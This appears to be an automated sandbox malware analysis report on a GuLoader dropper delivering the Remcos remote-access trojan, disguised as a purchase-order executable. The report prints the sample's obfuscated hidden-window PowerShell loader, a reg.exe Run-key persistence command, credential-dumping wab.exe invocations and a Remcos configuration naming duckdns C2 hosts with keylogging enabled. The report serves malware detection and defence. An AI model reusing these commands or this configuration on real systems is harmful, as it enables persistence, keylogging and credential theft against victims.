Edit tour
Windows
Analysis Report
z14Novospedidosdecompra_Profil_4903.exe
Overview
General Information
Detection
GuLoader, Remcos
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected GuLoader
Yara detected Remcos RAT
C2 URLs / IPs found in malware configuration
Connects to many ports of the same IP (likely port scanning)
Found suspicious powershell code related to unpacking or dynamic code loading
Hides threads from debuggers
Installs a global keyboard hook
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Obfuscated command line found
Powershell drops PE file
Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Uses dynamic DNS services
Writes to foreign memory regions
Yara detected WebBrowserPassView password recovery tool
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Potential Dosfuscation Activity
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sleep loop found (likely to delay execution)
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Classification
- System is w10x64
- z14Novospedidosdecompra_Profil_4903.exe (PID: 6864 cmdline:
"C:\Users\ user\Deskt op\z14Novo spedidosde compra_Pro fil_4903.e xe" MD5: 0E1262A4CE5AC71AD5B8DF93030D61B5) - powershell.exe (PID: 6452 cmdline:
"powershel l.exe" -wi ndowstyle hidden "$B romslvs=Ge t-Content 'C:\Users\ user\AppDa ta\Roaming \skabiose\ slgtsarven s\prender\ Kursusplan s.Fje';$Ox yphosphate =$Bromslvs .SubString (61080,3); .$Oxyphosp hate($Brom slvs)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - conhost.exe (PID: 6600 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 7192 cmdline:
"C:\Window s\system32 \cmd.exe" /c "set /A 1^^0" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - wab.exe (PID: 7812 cmdline:
"C:\Progra m Files (x 86)\window s mail\wab .exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89) - cmd.exe (PID: 7864 cmdline:
"C:\Window s\System32 \cmd.exe" /c REG ADD HKCU\Soft ware\Micro soft\Windo ws\Current Version\Ru n /f /v "S tartup key " /t REG_E XPAND_SZ / d "%Slette lsers% -wi ndowstyle minimized $ronnels=( Get-ItemPr operty -Pa th 'HKCU:\ Forsorgspd agog\').Sk eletoverst ter;%Slett elsers% ($ ronnels)" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 7872 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - reg.exe (PID: 7912 cmdline:
REG ADD HK CU\Softwar e\Microsof t\Windows\ CurrentVer sion\Run / f /v "Star tup key" / t REG_EXPA ND_SZ /d " %Slettelse rs% -windo wstyle min imized $ro nnels=(Get -ItemPrope rty -Path 'HKCU:\For sorgspdago g\').Skele toverstter ;%Slettels ers% ($ron nels)" MD5: CDD462E86EC0F20DE2A1D781928B1B0C) - wab.exe (PID: 8104 cmdline:
"C:\Progra m Files (x 86)\window s mail\wab .exe" /ste xt "C:\Use rs\user\Ap pData\Loca l\Temp\wjd znalymjqnx oyrjyc" MD5: 251E51E2FEDCE8BB82763D39D631EF89) - wab.exe (PID: 8112 cmdline:
"C:\Progra m Files (x 86)\window s mail\wab .exe" /ste xt "C:\Use rs\user\Ap pData\Loca l\Temp\wjd znalymjqnx oyrjyc" MD5: 251E51E2FEDCE8BB82763D39D631EF89) - wab.exe (PID: 8120 cmdline:
"C:\Progra m Files (x 86)\window s mail\wab .exe" /ste xt "C:\Use rs\user\Ap pData\Loca l\Temp\hdq rgswaarisa uuvaipksos " MD5: 251E51E2FEDCE8BB82763D39D631EF89) - wab.exe (PID: 8148 cmdline:
"C:\Progra m Files (x 86)\window s mail\wab .exe" /ste xt "C:\Use rs\user\Ap pData\Loca l\Temp\jfw cglgtwzafk aizktcddtn ovi" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
CloudEyE, GuLoader | CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored. | No Attribution |
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
Remcos, RemcosRAT | Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity. |
{"Host:Port:Password": "learfo55ozj01.duckdns.org:29871:0learfo55ozj01.duckdns.org:29872:1learfo55ozj02.duckdns.org:29872:1", "Assigned name": "Top", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "alpwovnb-G3F5OR", "Keylog flag": "1", "Keylog path": "AppData", "Keylog file": "mqerms.dat", "Keylog crypt": "Disable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security | ||
JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security | ||
JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security | ||
JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security | ||
JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security | ||
Click to see the 2 entries |
System Summary |
---|
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): |
Source: | Author: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: |
Source: | Author: frack113, Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: frack113, Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
Timestamp: | 04/19/24-19:12:11.492624 |
SID: | 2032777 |
Source Port: | 29871 |
Destination Port: | 49738 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 04/19/24-19:12:11.262632 |
SID: | 2032776 |
Source Port: | 49738 |
Destination Port: | 29871 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Click to jump to signature section
Show All Signature Results
AV Detection |
---|
Source: | URL Reputation: | ||
Source: | URL Reputation: |
Source: | Malware Configuration Extractor: |
Source: | ReversingLabs: |
Source: | ReversingLabs: |
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Source: | Joe Sandbox ML: |
Source: | Joe Sandbox ML: |
Source: | Static PE information: |
Source: | HTTPS traffic detected: |
Source: | Static PE information: |
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: |
Source: | Code function: | 0_2_00405841 | |
Source: | Code function: | 0_2_004027FB | |
Source: | Code function: | 0_2_00406393 | |
Source: | Code function: | 12_2_0040AE51 | |
Source: | Code function: | 13_2_00407EF8 | |
Source: | Code function: | 14_2_00407898 |
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior |
Networking |
---|
Source: | Snort IDS: | ||
Source: | Snort IDS: |
Source: | URLs: |
Source: | TCP traffic: |
Source: | DNS query: |
Source: | TCP traffic: |
Source: | HTTP traffic detected: |
Source: | IP Address: | ||
Source: | IP Address: |
Source: | ASN Name: |
Source: | JA3 fingerprint: |
Source: | HTTP traffic detected: |
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | DNS traffic detected: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | Network traffic detected: | ||
Source: | Network traffic detected: |
Source: | HTTPS traffic detected: |
Key, Mouse, Clipboard, Microphone and Screen Capturing |
---|
Source: | Windows user hook set: | Jump to behavior |
Source: | Code function: | 0_2_004052EE |
Source: | Code function: | 12_2_0040987A | |
Source: | Code function: | 12_2_004098E2 | |
Source: | Code function: | 13_2_00406DFC | |
Source: | Code function: | 13_2_00406E9F | |
Source: | Code function: | 14_2_004068B5 | |
Source: | Code function: | 14_2_004072B5 |
E-Banking Fraud |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
System Summary |
---|
Source: | File created: | Jump to dropped file |
Source: | Process Stats: |
Source: | Code function: | 12_2_0040DD85 | |
Source: | Code function: | 12_2_00401806 | |
Source: | Code function: | 12_2_004018C0 | |
Source: | Code function: | 13_2_004016FD | |
Source: | Code function: | 13_2_004017B7 | |
Source: | Code function: | 14_2_00402CAC | |
Source: | Code function: | 14_2_00402D66 |
Source: | Code function: | 0_2_004032A0 |
Source: | File created: | Jump to behavior |
Source: | Code function: | 0_2_00407040 | |
Source: | Code function: | 0_2_00406869 | |
Source: | Code function: | 0_2_00404B2B | |
Source: | Code function: | 1_2_04F4EFF8 | |
Source: | Code function: | 1_2_04F4F8C8 | |
Source: | Code function: | 1_2_04F4ECB0 | |
Source: | Code function: | 12_2_0044B040 | |
Source: | Code function: | 12_2_0043610D | |
Source: | Code function: | 12_2_00447310 | |
Source: | Code function: | 12_2_0044A490 | |
Source: | Code function: | 12_2_0040755A | |
Source: | Code function: | 12_2_0043C560 | |
Source: | Code function: | 12_2_0044B610 | |
Source: | Code function: | 12_2_0044D6C0 | |
Source: | Code function: | 12_2_004476F0 | |
Source: | Code function: | 12_2_0044B870 | |
Source: | Code function: | 12_2_0044081D | |
Source: | Code function: | 12_2_00414957 | |
Source: | Code function: | 12_2_004079EE | |
Source: | Code function: | 12_2_00407AEB | |
Source: | Code function: | 12_2_0044AA80 | |
Source: | Code function: | 12_2_00412AA9 | |
Source: | Code function: | 12_2_00404B74 | |
Source: | Code function: | 12_2_00404B03 | |
Source: | Code function: | 12_2_0044BBD8 | |
Source: | Code function: | 12_2_00404BE5 | |
Source: | Code function: | 12_2_00404C76 | |
Source: | Code function: | 12_2_00415CFE | |
Source: | Code function: | 12_2_00416D72 | |
Source: | Code function: | 12_2_00446D30 | |
Source: | Code function: | 12_2_00446D8B | |
Source: | Code function: | 12_2_00406E8F | |
Source: | Code function: | 13_2_00405038 | |
Source: | Code function: | 13_2_0041208C | |
Source: | Code function: | 13_2_004050A9 | |
Source: | Code function: | 13_2_0040511A | |
Source: | Code function: | 13_2_0043C13A | |
Source: | Code function: | 13_2_004051AB | |
Source: | Code function: | 13_2_00449300 | |
Source: | Code function: | 13_2_0040D322 | |
Source: | Code function: | 13_2_0044A4F0 | |
Source: | Code function: | 13_2_0043A5AB | |
Source: | Code function: | 13_2_00413631 | |
Source: | Code function: | 13_2_00446690 | |
Source: | Code function: | 13_2_0044A730 | |
Source: | Code function: | 13_2_004398D8 | |
Source: | Code function: | 13_2_004498E0 | |
Source: | Code function: | 13_2_0044A886 | |
Source: | Code function: | 13_2_0043DA09 | |
Source: | Code function: | 13_2_00438D5E | |
Source: | Code function: | 13_2_00449ED0 | |
Source: | Code function: | 13_2_0041FE83 | |
Source: | Code function: | 13_2_00430F54 | |
Source: | Code function: | 14_2_004050C2 | |
Source: | Code function: | 14_2_004014AB | |
Source: | Code function: | 14_2_00405133 | |
Source: | Code function: | 14_2_004051A4 | |
Source: | Code function: | 14_2_00401246 | |
Source: | Code function: | 14_2_0040CA46 | |
Source: | Code function: | 14_2_00405235 | |
Source: | Code function: | 14_2_004032C8 | |
Source: | Code function: | 14_2_00401689 | |
Source: | Code function: | 14_2_00402F60 |
Source: | Static PE information: | ||
Source: | Static PE information: |
Source: | Binary or memory string: |
Source: | Static PE information: |
Source: | Process created: |
Source: | Classification label: |
Source: | Code function: | 12_2_004182CE |
Source: | Code function: | 0_2_004032A0 | |
Source: | Code function: | 14_2_00410DE1 |
Source: | Code function: | 0_2_004045AF |
Source: | Code function: | 12_2_00413D4C |
Source: | Code function: | 0_2_00402095 |
Source: | Code function: | 12_2_0040B58D |
Source: | File created: | Jump to behavior |
Source: | Mutant created: | ||
Source: | Mutant created: | ||
Source: | Mutant created: | ||
Source: | Mutant created: |
Source: | File created: | Jump to behavior |
Source: | Static PE information: |
Source: | System information queried: | Jump to behavior |
Source: | WMI Queries: |
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | ReversingLabs: |
Source: | File read: | Jump to behavior |
Source: | Evasive API call chain: | graph_13-32948 |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Source: | Window detected: |
Source: | File opened: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | Static PE information: |
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: |
Data Obfuscation |
---|
Source: | File source: |
Source: | Anti Malware Scan Interface: | ||
Source: | Anti Malware Scan Interface: |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Code function: | 12_2_004044A4 |
Source: | Code function: | 1_2_07B0A11E | |
Source: | Code function: | 1_2_07B0A049 | |
Source: | Code function: | 12_2_0044694D | |
Source: | Code function: | 12_2_0044DB84 | |
Source: | Code function: | 12_2_0044DBAC | |
Source: | Code function: | 12_2_00451D61 | |
Source: | Code function: | 13_2_0044B0A4 | |
Source: | Code function: | 13_2_0044B0CC | |
Source: | Code function: | 13_2_00444E81 | |
Source: | Code function: | 14_2_00414074 | |
Source: | Code function: | 14_2_0041409C | |
Source: | Code function: | 14_2_00414049 | |
Source: | Code function: | 14_2_004165C4 | |
Source: | Code function: | 14_2_004165C4 | |
Source: | Code function: | 14_2_004165C4 |
Source: | File created: | Jump to dropped file |
Source: | Registry value created or modified: | Jump to behavior | ||
Source: | Registry value created or modified: | Jump to behavior |
Source: | Code function: | 13_2_004047CB |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Source: | Code function: | 12_2_0040DD85 |
Source: | Thread delayed: | Jump to behavior |
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior |
Source: | API coverage: |
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep count: | Jump to behavior |
Source: | Last function: | ||
Source: | Last function: | ||
Source: | Last function: |
Source: | Thread sleep count: | Jump to behavior |
Source: | Code function: | 0_2_00405841 | |
Source: | Code function: | 0_2_004027FB | |
Source: | Code function: | 0_2_00406393 | |
Source: | Code function: | 12_2_0040AE51 | |
